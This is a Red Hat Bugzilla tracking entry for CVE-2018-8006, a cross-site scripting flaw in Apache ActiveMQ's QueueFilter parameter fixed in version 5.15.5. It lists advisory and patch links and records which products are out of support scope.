Bug 1622774 (CVE-2018-8006)

Summary: CVE-2018-8006 activemq: Cross-site scripting (XSS) via QueueFilter parameter
Product: [Other] Security Response Reporter: Sam Fowler <sfowler>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: agrimm, aileenc, alazarot, anstephe, bmaxwell, bmcclain, cdewolf, chazlett, csutherl, darran.lofthouse, dfediuck, dimitris, dosoudil, drieden, eedri, etirelli, gvarsami, ibek, java-sig-commits, jawilson, jcoleman, jshepherd, krathod, kverlaen, ldimaggi, lgao, mgoldboi, michal.skrivanek, myarboro, nwallace, pdrozd, psampaio, pslavice, psotirop, puntogil, rnetuka, rrajasek, rsvoboda, rsynek, rwagner, rzhang, sbonazzo, sdaley, security-response-team, sherold, s, sthorger, tcunning, tdawson, tkirby, tmielke, twalsh, vtunka
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: activemq 5.15.5 Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2021-10-25 22:15:56 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1622775    
Bug Blocks: 1622776    

Description Sam Fowler 2018-08-28 02:40:55 UTC 
Apache ActiveMQ before version 5.15.5 is vulnerable to cross-site scripting (XSS) flaw via the QueueFilter parameter. An attacker could exploit this by feeding a URL encoded script to the QueueFilter parameter in the URI.


External Reference:

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-008/?fid=11632


Upstream Bug:

https://issues.apache.org/jira/browse/AMQ-6954


Upstream Patches:

https://git-wip-us.apache.org/repos/asf?p=activemq.git;h=d25de5d
https://git-wip-us.apache.org/repos/asf?p=activemq.git;h=d8c80a9
Comment 1 Sam Fowler 2018-08-28 02:41:42 UTC 
Created activemq tracking bugs for this issue:

Affects: fedora-all [bug 1622775]
Comment 4 Joshua Padman 2019-05-15 22:53:59 UTC 
This vulnerability is out of security support scope for the following products:
 * Red Hat JBoss A-MQ 6
 * Red Hat JBoss Fuse Service Works 6
 * Red Hat JBoss Fuse 6

Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.
Comment 7 Joshua Padman 2019-08-12 01:35:24 UTC 
This vulnerability is out of security support scope for the following products:
 * JBoss Developer Studio 11

Please refer to https://access.redhat.com/node/4027141 for more details.
Comment 8 Joshua Padman 2019-08-28 11:08:57 UTC 
Statement:

Red Hat Single Sign-On does not include the vulnerable web console components.